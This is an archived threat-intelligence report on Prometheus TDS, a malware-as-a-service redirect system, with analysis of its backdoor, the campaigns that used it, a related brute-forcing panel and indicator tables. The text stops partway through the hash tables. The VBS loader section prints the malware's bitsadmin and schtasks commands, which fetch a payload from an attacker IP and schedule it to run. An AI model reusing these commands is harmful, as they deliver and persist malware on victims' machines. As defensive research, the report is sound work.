{
	"id": "28284f12-28db-4f6a-8d00-510b2f5112fd",
	"created_at": "2026-05-05T02:45:16.920792Z",
	"updated_at": "2026-05-05T02:46:37.020889Z",
	"deleted_at": null,
	"sha1_hash": "cc948c06d8d86a53972435a2bbd308654ccc8a22",
	"title": "Prometheus TDS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5941530,
	"plain_text": "Prometheus TDS\r\nArchived: 2026-05-05 02:27:54 UTC\r\nIntroduction\r\nIn the spring of 2021, Group-IB’s Threat Intelligence analysts discovered traces of a malware campaign distributing\r\nHancitor. The researchers took an interest in an untypical pattern of the downloader’s distribution, which was subsequently\r\ndescribed by Unit 42 and McAfee researchers as a new technique designed to hide documents containing malicious links\r\nfrom web scanners’ radars. However, the data extracted by Group-IB’s analysts indicates that a similar pattern is also used to\r\ndistribute malware such as Campo Loader, IcedID, QBot, SocGholish, and Buer Loader.\r\nGroup-IB discovered at least 3,000 targets of separate malware campaigns that make use of the same scheme. By\r\nanalyzing the list of targets, the experts were able to establish the two most active campaigns. The first targeted individuals\r\nin Belgium, and the second targeted companies, corporations, universities, and government organizations in the United\r\nStates.\r\nBy analyzing the malware distribution campaigns, Group-IB’s experts were able to conclude that it was possible for them to\r\nbe carried out using the same MaaS solution. This assumption was later confirmed by Group-IB’s analysts after they found a\r\nsale notice for a service designed to distribute malicious files and redirect users to phishing and malicious sites —\r\nPrometheus TDS (Traffic Direction System) — on one of the underground platforms.\r\nDescription\r\nPrometheus TDS is an underground service that distributes malicious files and redirects visitors to phishing and\r\nmalicious sites. This service is made up of the Prometheus TDS administrative panel, in which an attacker configures the\r\nnecessary parameters for a malicious campaign: downloading malicious files, and configuring restrictions on users’\r\ngeolocation, browser version, and operating system.\r\nTo prevent victims of malicious campaigns from interacting with the administrative panel directly, which may result in the\r\nattacker’s server being disclosed and blocked, Prometheus TDS uses third-party infected websites that act as a\r\nmiddleman between the attacker’s administrative panel and the user. It should also be mentioned that the list of\r\ncompromised websites is manually added by the malware campaign’s operators. The list is uploaded through importing links\r\nto web shells. A special PHP file named Prometheus.Backdoor is uploaded to the compromised websites to collect and send\r\nback data about the user interacting with the administrative panel. After analyzing the data collected, the administrative\r\npanel decides whether to send the payload to the user and/or to redirect them to the specified URL.\r\nMore than three thousand email addresses targeted in the first phase of malicious campaigns in which Prometheus\r\nTDS was used to send malicious emails were extracted by Group-IB Threat Intelligence analysts. The extracted data\r\nanalysis helped identify the most active campaigns, one targeting individuals in Belgium (more than 2,000 emails) and the\r\nother targeting US government agencies, companies, and corporations in various sectors (banking and finance, retail, energy\r\nand mining, cybersecurity, healthcare, IT, and insurance), (more than 260 emails). The data about identified targets of attacks\r\nwith the use of Prometheus TDS and companies affected as their result has been handed over to the US, German and\r\nBelgian CERTs.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 1 of 37\n\nTargets of malicious campaigns with the use of Prometheus TDS\r\nAttack scheme using Prometheus TDS\r\nThe distribution of malware using Prometheus TDS is carried out in several stages.\r\nStage 1\r\nThe user receives an email containing one of the following elements:\r\nAn HTML file that redirects the user to a compromised site on which Prometheus.Backdoor is installed;\r\nA link to a web shell that redirects users to a specified URL, in this case to one of the addresses used by Prometheus\r\nTDS;\r\nA link to a Google Doc containing the URL redirecting users to a malicious link.\r\nThe implementation of malicious campaigns with the use of Prometheus TDS\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 2 of 37\n\nGoogle Docs files used by Prometheus TDS\r\nStage 2\r\nThe user opens the attachment or follows the link and is redirected to the Prometheus.Backdoor URL. Prometheus.Backdoor\r\ncollects the available data on the user.\r\nStage 3\r\nThe data collected is sent to the Prometheus TDS admin panel. This admin panel then decides whether to instruct the\r\nbackdoor to send a malicious file to the users and/or to redirect them to the specified URL.\r\nAnalysis of Prometheus.Backdoor\r\nMalicious campaigns using Prometheus TDS are carried out via hacked sites with Prometheus.Backdoor installed on them.\r\nThe backdoor is controlled through the admin panel.\r\nPrometheus TDS admin panel\r\nThe data exchange between the administrative panel and the backdoor is encrypted with an XOR cipher. The key for this\r\ncipher is explicitly hardcoded in the Prometheus.Backdoor settings, along with the address of the administrative panel used\r\nby the attackers to manage backdoors on infected sites.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 3 of 37\n\nA fragment of the Prometheus.Backdoor code containing the address of the administrative panel, a key for encrypting\r\ntransmitted data, and functions for encrypting and decrypting data\r\nAfter the user visits the infected site, Prometheus.Backdoor collects basic information about them: IP address, User-Agent,\r\nReferrer header, time zone, and language data, and then forwards this information to the Prometheus admin panel.\r\nPart of the Prometheus.Backdoor code used to collect information about the user’s time zone\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 4 of 37\n\nPart of the Prometheus.Backdoor code showing the algorithm used to generate a request to the administrative panel for the\r\ntransfer of visitor data\r\nIf the user is not recognized as a bot, then, depending on the configuration, the administrative panel can send a\r\ncommand to redirect the user to the specified URL, or to send a malicious file. The payload file is sent using a special\r\nJavaScript code. Most often, the malicious software can be found in weaponized Microsoft Word or Excel documents,\r\nhowever, the attackers also use ZIP and RAR files. In some cases, the user will be redirected to a legitimate site immediately\r\nafter downloading the file, so it will appear to them like the file was downloaded from a safe source.\r\nPart of the Prometheus.Backdoor code showing a method for serving malicious files\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 5 of 37\n\nMalware campaigns analysis\r\nCampo Loader\r\nAnalyzing the extracted files, Group-IB Threat Intelligence analysts found 18 unique malicious documents relating to the\r\nCampo Loader, aka the BazaLoader malware. After downloading the malware, the user is redirected to the DocuSign or\r\nUSPS sites as a distraction from the malware’s activity.\r\nA screenshot of a decoy document from the “Campo Loader” distribution campaign\r\nCampo Loader spreads through malicious macros in Microsoft Office documents. After the victim activates the macros,\r\nthe loader saves and then decodes the .dll file, which is executed through certutil. After the dumped .dll file is executed, it\r\nsends an HTTP request to its C\u0026C server:\r\nContent of the malicious macros\r\nThe server processes the incoming request and, depending on the victim’s geolocation (based on their IP address) decides\r\nwhether to send the payload or redirect them to Yahoo!, GNU, or other resources. The downloader takes its name from the\r\npath of the same name in HTTP requests used to download malicious files during the second stage.\r\nRedirection to gnu.org\r\nIf the administrative panel gives the command to send the payload, then the user is redirected to the resource where it is\r\nstored or receives it directly from the C\u0026C server.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 6 of 37\n\nResults of the request satisfying the server’s requirements to upload a second stage file\r\nAnalysis revealed that Campo Loader was used at various times to distribute TrickBot and Ursnif/Gozi bankers, etc.\r\nCampo Loader administrative panel\r\nHancitor\r\nMonitoring of Prometheus TDS revealed 34 malicious documents relating to the Hancitor malware, which is a downloader\r\ntrojan.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 7 of 37\n\nA screenshot of a decoy document from the Hancitor distribution campaign\r\nAfter downloading the malicious document, the victim is either redirected to the DocuSign website, or to phishing sites\r\nusing IDN domains that imitate the sites of two US banks.\r\nA phishing page to which a user was redirected after downloading a malicious Hancitor load located on an IDN domain xn--\r\nkeynvigatorkey-yp8g[.]com (https://urlscan.io/result/108463b8-7c0d-4644-9d2b-52cbca3426f8/)\r\nOne of the files identified (SHA1: 41138f0331c3edb731c9871709cffd01e4ba2d88) was sent in a phishing email containing a\r\nlink to a Google Doc. The document stored in Google Docs contained the link hXXps://webworks.nepila[.]com/readies.php.\r\nWhen the victim clicks on the link, a request is sent to Prometheus.Backdoor. The server then processes the data collected\r\nabout the user’s system and decides whether to send the payload or not.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 8 of 37\n\nAn example of requests to a site containing Prometheus.Backdoor, with successful delivery of a malicious document and\r\nsubsequent redirection to DocuSign\r\nThe screenshot above shows that the response to the first request for the file “readies.php” is 937 bits, while the second one\r\nis 424,594 bits. This means that the server approved the victim’s device settings and the second request resulted in the\r\ndownload of the Base64 file “0301_343810790.doc“. After downloading the file, the victim is redirected to Docusign.com.\r\nPart of the Prometheus.Backdoor code showing a malicious file distribution pattern\r\nThe saved file “0301_343810790.doc” is a .doc file containing malicious macros. After activating the macros in the\r\ndocument, the DLL file is dropped and executed by path c:\\users\\%username%\\appdata\\local\\temp\\Static.dll, using\r\nrundll32.exe. After the file has been executed, the following HTTP requests are sent:\r\nhxxp://api.ipify[.]org/\r\nhxxp://ementincied[.]com/8/forum.php\r\nhxxp://mymooney[.]ru/6fwedzs3w3fg.exe\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 9 of 37\n\nThe downloaded file “6fwedzs3w3fg.exe” (SHA1: 7394632d8cfc00c35570d219e49de63076294b6b ) is a sample of Ficker\r\nStealer\r\nIn April 2021, Unit 42 researchers partially analyzed this campaign. The experts also mention the Ficker Stealer, Cobalt\r\nStrike, and Send-Safe spambots in their research.\r\nQBot\r\nThe following documents were found among the files used to distribute the banking trojan QBot.\r\nFilename SHA1\r\ndocument-12603942.xls 2d74e52ac0e3ebbf2bb4aabb6469cba9badd70eb\r\ndocument-348056604.xls db23b35b2c2b8bf413fb57ee9017127f651e0304\r\nThese documents are lure files that require macro activation when launched. As soon as the macros are activated, an HTTP\r\nrequest is sent to download the DLL file with the payload.\r\nDecoy document from the QBot distribution campaign\r\nThe malicious document discovered was sending requests to the following URL addresses:\r\nhttps://inpulsion[.]net/ds/0702.gif\r\nhttps://aramiglobal[.]com/ds/0502.gif\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 10 of 37\n\nThe content of malicious macros\r\nThe content of malicious macros\r\nUnfortunately, at the time of analysis, these files were no longer available. However, our data suggests that QBot is loaded\r\nvia these paths.\r\nIcedID\r\nOne of the malicious documents sent using Prometheus TDS distributed the banking Trojan IcedID, aka Bokbot.\r\nA screenshot of a decoy document from the IcedID malware distribution campaign\r\nAfter opening the document and running the macros, the office file attempted to download and run the DLL file at\r\nhXXp://denazao[.]info/images/1j.djvu. The file was not available at the time of analysis. A similar office document was\r\nfound on VirusTotal; it also downloaded the payload from hXXp://denazao[.]info/images/1j.djvu. After launching the\r\npayload, the request was sent to the IcedID C\u0026C server located at hXXp://twotimercvac[.]uno/.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 11 of 37\n\nGraph representing the IcedID C2 environment\r\nVBS Loader\r\nDuring the analysis, the specialists found three samples of an unidentified VBS loader. After downloading these files, the\r\nuser is redirected to the USPS website. When the user clicks on a malicious link, Prometheus TDS asks the user to download\r\na ZIP archive containing a VBS script. After the script is launched, the payload is downloaded in the form of another VBS\r\nscript using bitsadmin. The downloaded file is launched using the Windows Task Scheduler by creating a command that runs\r\nthe VBS script every 30 minutes starting at 00:00.\r\nPart of the obfuscated VBS loader containing the URL for the payload download\r\nTo download and run the payload, the VBS script executes a set of special commands using bitsadmin and schtasks:\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 12 of 37\n\ncmd /k exit | exit \u0026 bitsadmin /create EncodingFirm \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669\r\nC:\\Users\\\u003cUser\u003e\\AppData\\Local\\Temp\\DefineKeeps.tmp \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /resume EncodingFirm \u0026 exit\r\ncmd /k exit | exit \u0026 schtasks /create /sc minute /mo 30 /tn “Task Update ButPrinciple” /f /st 00:00 /tr C:\\Users\\\r\n\u003cUser\u003e\\AppData\\Local\\ButPrinciple\\ButPrinciple.vbs \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /complete EncodingFirm \u0026 exit\r\ncmd /k exit | exit \u0026 bitsadmin /reset \u0026 exit\r\nAt the time of analysis, there was only one similar VBS loader sample on VirusTotal, which was detectable by only one\r\nantivirus solution.\r\nAntivirus detection for file fcd8674f8df4390d90dad6c31a3dd6f33d6a74de\r\nBuer Loader\r\nWithin the campaign, the file “document010498(1).zip” was also distributed. It contained the file “document010498.jnlp“,\r\nwhich downloads the payload from the domain “secure-doc-viewer[.]com“.\r\nUnfortunately, at the time of analysis, the domain was not active. Based on the contents of the file, it seems reasonable to\r\nassume that it is a decoy document used to download files relating to the second stage.\r\nContents of the file document010498.jnlp\r\nAn analysis of the domain “secure-doc-viewer[.]com” by the experts using Group-IB’s graph revealed that the owner’s\r\nname, as indicated in the WHOIS records of the domain, is “artem v gushin.” The analysis also showed that this name is\r\nconnected to more than 50 domains.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 13 of 37\n\nPart of the connections of the domain secure-doc-viewer[.]com according to WHOIS records\r\nAmong the related domains, researchers identified several of them using the same keywords:\r\npdfsecure[.]net\r\nsecurepdfviewer[.]com\r\ninvoicesecure[.]net\r\nThe domains are also related to .jnlp files, for example, “invoice.jnlp” (SHA1:\r\ne3249b46e76b3d94b46d45a38e175ef80b7d0526).\r\nContent of the invoice.jnlp\r\nSeveral studies indicate that the above domains are part of the Buer Loader distribution campaign.\r\nSocGholish\r\nThe analysis of the URLs of the compromised sites used in the Prometheus TDS infrastructure revealed that some of them\r\nredirect the user to the home page of the compromised website.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 14 of 37\n\nPrometheus.Backdoor URL that redirects the visitor to the home page of the compromised site\r\nThrough research, it was discovered that these sites are used to distribute the SocGholish malware under the guise of\r\nGoogle Chrome browser updates.\r\nLoading a landing page with fake Google Chrome browser updates\r\nAt the same time, SocGholish uses a malicious file distribution pattern very similar to the script used by Prometheus TDS.\r\nWhen the user visits an infected site, they see a page with JavaScript code that contains a Base64 encoded ZIP archive with\r\na malicious file that will be downloaded if the user clicks on the “Update browser” button.\r\nPart of the SocGholish landing page\r\nTo the user, this page appears to be offering browser updates.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 15 of 37\n\nScreenshot of the fake page offering a Chrome browser update\r\nFake VPN\r\nIn addition to distributing malicious files, Prometheus TDS is also used as a classic TDS to redirect users to specific sites.\r\nOne of these sites is the fake site of a well-known VPN provider located at hXXps://huvpn[.]com/free-vpn/. Clicking the\r\ndownload button initiates the download of a malicious EXE file from hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).\r\nA screenshot of a fake Windscribe download page\r\nViagra SPAM\r\nPrometheus TDS also redirected users to sites selling pharmaceutical products. Operators of such sites often have\r\naffiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns in order to increase the\r\nearnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that\r\nredirect users to sites relating to a Canadian pharmacy.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 16 of 37\n\nThe use of Prometheus TDS for spam emails to redirect users to particular websites\r\nBanking phishing\r\nPrometheus TDS was also used to redirect users to banking phishing sites. For example, during a campaign active from\r\nMarch to May 2021, users who followed the link to Prometheus.Backdoor were redirected to fake sites that mimicked the\r\nsite of a German bank.\r\nExample of a phishing page used in the campaign involving Prometheus TDS https://urlscan.io/result/69c84104-f272-4c88-\r\n970f-a3131c0580ad/\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 17 of 37\n\nOffers to buy Prometheus TDS on underground forums\r\nThe analysis presented above describes several unrelated campaigns carried out by different hacker groups using\r\nPrometheus TDS. Working based on the assumption that Prometheus TDS is a MaaS solution, Group-IB researchers\r\nanalyzed various underground forums in search of relevant offers and found a topic started by a user with the username\r\nMain.\r\nPrometheus TDS\r\nScreenshot of the offer to buy the Prometheus TDS\r\nScreenshot of the offer to buy the Prometheus TDS\r\nGroup-IB Threat Intelligence system discovered that the post offering Prometheus for sale was created in August 2020. The\r\nowner of the service claimed that Prometheus TDS is an ANTIBOT redirect system designed to send out emails, work with\r\ntraffic, and for social engineering. In addition, Prometheus TDS can validate web shells, create and configure redirects,\r\noperate via proxy, and work with Google accounts, etc. Moreover, the system is able to validate users based on a blacklist,\r\nwhich makes it possible for malicious links to avoid being added to antivirus and spam databases.\r\nPrometheus has two standard modes:\r\n1. Redirecting users to a target page;\r\n2. Issuing files for download (DOC, PDF, JS, VBS, EXE).\r\nThe cost of the system is $250 per month. Screenshots from Prometheus TDS admin level provided by Main can be found\r\nbelow:\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 18 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 19 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 20 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 21 of 37\n\nBRChecker\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 22 of 37\n\nWhen examining and monitoring the infrastructure used to host the Prometheus TDS administrative panels, Group-IB\r\nexperts discovered that some of the servers on which the Prometheus TDS admin panel was previously located now host\r\nanother unknown panel.\r\nThe following is a list of addresses at which different panels were located at different times:\r\n188.130.138[.]63;\r\n188.130.138[.]22;\r\n188.130.138[.]236;\r\n188.130.138[.]61;\r\n185.186.142[.]32.\r\nBased on the contents of this admin panel’s JS scripts, Group-IB experts assumed that it is a panel from another solution\r\ncalled BRChecker.\r\nListing of scripts from BRCheker admin panel\r\nAn offer to sell the BRChecker system presented as an email address bruter\\checker was for the first time posted by the user\r\nwith the username Mainin mid-June 2018. According to the developer’s description, the system works via modules\r\n(workers), installed on rented VPS servers, and controlled through a single admin panel for subsequent brute-forcing or\r\nverification of login/password bindings.\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 23 of 37\n\nScreenshot of a sale announcement for BRCheker\r\nAs of May 2021, the cost of the system was $490. Screenshots of BRChecker admin panel provided by Main can be found\r\nbelow:\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 24 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 25 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 26 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 27 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 28 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 29 of 37\n\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 30 of 37\n\nScreenshot of the BRChecker admin panel\r\nThe contents of the screenshots in the for-sale notice made it possible to verify that the unknown panel detected\r\nbefore is indeed related to BRChecker.\r\nIndicators\r\nPrometheus.Backdoor JavaScript\r\nMD5 SHA1 SHA256\r\n2e515f89c1e57a82f439f160bdc91045\r\n87b16517171f\r\n993b8e0932cf9c27ae8afec169d6\r\n2777c710350668010542846968025d642d40984fa87ad21\r\nc5bc239bb990ca808b5645078c6710d1 a9964c999a28c850ef3fbb061d8272025ac38aaf 2f58ac50edbc16d8aa708d2f6b928076c3411a2fdeefa3031\r\nPrometheus TDS Admin\r\n109.248.11.132\r\n109.248.11.204\r\n109.248.11.67\r\n109.248.203.10\r\n109.248.203.112\r\n109.248.203.168\r\n109.248.203.198\r\n109.248.203.202\r\n109.248.203.207\r\n109.248.203.23\r\n109.248.203.33\r\n185.158.114.121\r\n185.186.142.191\r\n185.186.142.32\r\n185.186.142.59\r\n185.186.142.67\r\n185.186.142.77\r\n188.130.138.130\r\n188.130.138.22\r\n188.130.138.236\r\n188.130.138.57\r\n188.130.138.61\r\n188.130.138.63\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 31 of 37\n\n188.130.138.70\r\n188.130.139.103\r\n188.130.139.203\r\n188.130.139.228\r\n188.130.139.5\r\n188.130.139.88\r\n46.8.210.13\r\n46.8.210.30\r\n51.15.27.25\r\n62.138.0.68\r\nCampo Loader\r\nFilename MD5 SHA1 SHA256\r\norder-details-706518.xlsb\r\n0dcd730d8bb4e11b15a18b1dc76fc495 077baa375c2eea771867884cc8eeb632761346c9 a1b1abdf519253a124507080\r\nuser-Payment.xlsb 96e55bf478df6538526fb27d93ae0cff 143034d966a0a8fa125d3cfa2c59f8f6bc077fd1 baa41b445333a1763c335f6c\r\nuser-Payment.xlsb 2c3beba27a366bc0cdca9311b53bbeb9 21f6dc1ce6ae5c47e3fbb3f65fdf43deef90f022 452f2a77f8ebd6aaeb99456dc\r\nuser-Payment.xlsb fd7e9a5318d9a9a64ae6fcda0fecf775 2327e25fd5fda04562b7541d772fb56a4573588e a7bf77112ee1d7c856d90366\r\nkirill_gelfand-Payment.xlsb\r\n0e813468897ad3c4c13ed181808c07f1 2ae9e9b711cabfa5ed84786a5b40caa458188442 4dd8ba0d5ac44a54b2192267\r\nInformation_78333.xlsb 779f1cd885dfc236f72803640408d194 2fbba4ede1959b87c221e48b53566e9861b445b9 e8282f5b348181a9986c759c\r\nadir_raz-Payment.xlsb 1cae28a21a78769749abb5f1b861f35f 2fe310539baeba8f254c85bc36ec21a66d73d7d8 1d5d97a5cb51c4d83dfdd662\r\nDocument_898285.xlsb 1bf18263da33a285acc74ff2759ad84e 4306a7fd5c5f91e7508448621e3895a57e38cfce 88ae71852b61934d4d3e27b6\r\nAttachment_89237.xlsb 46135129250f719456a5053b3eced9a0 43a991b86b533fc1af8d4bb12f41c666f9187764 370ab9a4ac29c2c7a121de17\r\nuser-Payment.xlsb f2927864387a2fe4019ad0aa9113254e 743d4727f828bf2247e5ab2745266194acb44405 97b912e93c00743cced68f7a\r\nuser-Payment.xlsb 2946f055d65da4ec48541d9237d7e157 9b8b5dd6df5b7ea73d2996731abb85178b8f3791 d26a56178fd6d15d1e6a8a15\r\nAttachment_64302.xlsb dcf728310285350f57d2b39c036e8b96 9f45863dc4381863a9b9533907b9aaf016211c36 8f329f8fd20acb25617c0d49d\r\nmolly.appelfeller-Payment.xlsb\r\ncdae61158a97d8bbda68ca756b02aa49 b391fde8dab17a03d9ebddcb628234c1ed203028 d21bb891b88039e9e0d00144\r\ndamian.piwowar-Payment.xlsb\r\ncdae61158a97d8bbda68ca756b02aa49 b391fde8dab17a03d9ebddcb628234c1ed203028 d21bb891b88039e9e0d00144\r\nuser-Payment.xlsb b8b2409c15aa18979084f4ba779df954 bf7cc9f91cc32937449ddc2f8627b1462099c7ee 9462ed453e355c587086a200\r\nuser-Payment.xlsb 77f8fdcca8db0aedd0e02a14a13cad1b c22ab2bc79be021552b7116f7582b6c66a5bee3b 2dc953ad0703d0e921c6e840\r\nmargaret.crain-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nphillip.taylor-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nkate.sullivan-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\ntom.powell-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nmolly.appelfeller-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\ntonya.cronce-Payment.xlsb\r\nc7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nzmaslen-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nuser-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nzach.arko-Payment.xlsb c7d0e439b2020d32bef71af529334fa6 ddf76ac3aee7e090dced9b49857e12efcd140165 452f2a77f8ebd6aaeb99456dc\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 32 of 37\n\nFilename MD5 SHA1 SHA256\r\nsjenner-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\nkate.sullivan-Payment.xlsb\r\n10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\nuser-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\ndarshana.govindan-Payment.xlsb\r\n10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\nmatt.harp-Payment.xlsb 10360f4838885037c303c5d1e54a40c1 e22bc05b3ff0891e18f414f0dc468078bf24720d ab1d6eacd13c7ce70852c85f8\r\npbamola-Payment.xlsb 1598cbcca37f6d92037ad5569b152ffa efa8af362029314cafdb5cd3b21acba0c3398b37 b629d7b71d99c562955ed114\r\nHancitor\r\nFilename MD5 SHA1 SHA256\r\n0208_5712084086062.doc 5797d7959a374447e004251696460f83 050990c1fd000aaf8e97eb4d08f349b5b9ccbb32 d600a2c30a57b53a650\r\n0211_18408623163382.doc f919678ac7cc958eea115481a871f781 1f166d3b7dd1d5b20fd86071755bcb294724ba92 8d29410ee9bd9f4004e\r\n0301_203089882.doc dd655abe26d4749ee69cd8ddff49298f 1ff915cb2697fea83433bcf920a6ae45ba3c9b4e 5f0f68a7db1d84e3ab93\r\n0318_41975026189871.doc c5792ce2154c652d9102fa4982dcfce3 32b5eaa378aa90610b40c88b3fbdace3f21b7021 121e2902c085cf41c9b9\r\n0301_343810790.doc 4fa931626b5cfaa706213db17d0c61dc 41138f0331c3edb731c9871709cffd01e4ba2d88 b7efa1277c0c0fba7549\r\n0406_19770546653272.doc e888673d08cbd88933e71d86d9906962 4701ebac8766510ef789c1a47d144779f0b899c0 1477b09d53363d8f4c7\r\n0211_41566363811571.doc 502041f49fa41b8548dd4ab95557448e 4f66ac0d73b73f5fed2159dccc7c64761d70088a 9b8cfb1a250908b51fcc\r\n0318_98323640085061.doc ed8d3539a3e027ec713cb7eddbb0dcf6 5253b7e09168b17bc8bfd7938e6ee054f5b5bb59 1d11fee370ab3997737f\r\n0318_98323640085061.doc ed8d3539a3e027ec713cb7eddbb0dcf6 5253b7e09168b17bc8bfd7938e6ee054f5b5bb59 1d11fee370ab3997737f\r\n0211_2442680243981.doc 63937ba70f16090c167212a5d8c0b2a1 55606e6d1d2806a6b13b88b1fed1e3f9dea6a035 eb8b21c4d9e48ec3d6d\r\n0406_85921776082182.doc fc7fac4b8e77b228f967cd25c39476fa 5b22b18112adbc9cc6db64728f6320b42ef9a66f 715aa88e5563d87cfec5\r\n0324_2126179849261.doc 53b94d001b82e06e57eca67254be3b19 5bd4058c15a3622e70e07a20e1d3ea52dd7a5c60 97dc8e1752f48c022db\r\n0216_2334240256090.doc 8333b8ae870a2cef892130cf985b3d08 632918f8023469a096ef664384446c75e0cd4f2c f3bd817ae5e3e96728ad\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 33 of 37\n\nFilename MD5 SHA1 SHA256\r\n0208_34749245710860.doc be5c90e2315d4db22d323adfdc3057f6 6d99dec7ab17caa1da6f12483f39151f6e70ea91 cee3c07353da4b23dc0\r\n0208_51143810436132.doc 5b991aedb6e96930489fa43aa34afb2c 706a91588eab2b1ded0c93c30d6613b456b2cd8b daa52d10cb1b1df7c372\r\n0208_51143810436132.doc 5b991aedb6e96930489fa43aa34afb2c 706a91588eab2b1ded0c93c30d6613b456b2cd8b daa52d10cb1b1df7c372\r\n0301_528419802.doc 76fc62eb1167875ec254929fed4cea3e 75777ad54707175412659a502ed54bf55bfaf89a 0a9ca5d5106405262d7\r\n0210_17982190848201.doc 15e650768be63e70f336744d339bda02 76867406d36aebd8b2975aa305d8f0f2403a0620 1a5d1cd7ed7e2cd7d5cb\r\n0311_77617920093261.doc 112295f0a9ef69518efc4534bebb6865 7fd36afe062136f082c2d3475f7aff24b6b3b847 bc81a5dc9ba20605bb9\r\n0208_14538810068331.doc 7d50dc239691bfc27a648026cebab145 828f3c89af3869533f5d789e6d631c19e7736def 6d0cbeb8f4514d90053\r\n0301_37832604.doc 716488121955bb115302037ed31e6ddb 8b696554838effc3793bfb7d680f8e496c896bb2 df078999b09c399a0e7\r\n0318_16237545349031.doc d66b30fbc8281f0c92407ddb3ef82658 8bb174b94349da541787548c06206a6f9f64f655 6c39a950e23ece571b1\r\n0216_20539741697592.doc f542d8c7130e6e88715b51322c5ca8ee 9cae9d2f4d8b227312ba24bb8d575c323d44aaeb 32c9c4f6c67a8217019c\r\n0406_88251355816452.doc f98badc4dbe19eddac7464bca1933067 a9b81030ab23c1afac3be8affe3787fc11b12a04 57596e1045ec19803b3\r\n0318_89347818081491.doc 8c2d156c1483af54a589ca9a0888c9e2 adbe445a2d3cb076f143285a6a94157651714a12 8686d43c68b9803440d\r\n0318_89347818081491.doc 8c2d156c1483af54a589ca9a0888c9e2 adbe445a2d3cb076f143285a6a94157651714a12 8686d43c68b9803440d\r\n0211_21229305048201.doc 915d6e04ea8617fb5006f3edab547fde ae6b1ac9a4f944b677849b7df3a59e6e2436ab24 3e71b2006a44fa8edc6f\r\n0301_206410993.doc be2a8c8ba6a7874ff04b58b56c2e6a9e af30fe099d85c5f6612b8b9834b365bd0420815a 9262edb2a995d0e0e78\r\n0225_1746399001456.doc fbd1028c5c51003c11f6f12c0233ecf6 b284c6e17f75feb31a3bc6246e2fd84b7e20b9bb c5548c98f2354230284\r\n0210_4367220121562.doc f59f1f6d258323ff7ae1a0d8201e4348 be3effcb9069ac6d66256c8246fde33e55980403 c98990d05f745f21e967\r\nhttps://blog.group-ib.com/prometheus-tds\r\nPage 34 of 37\n\nFilename MD5 SHA1 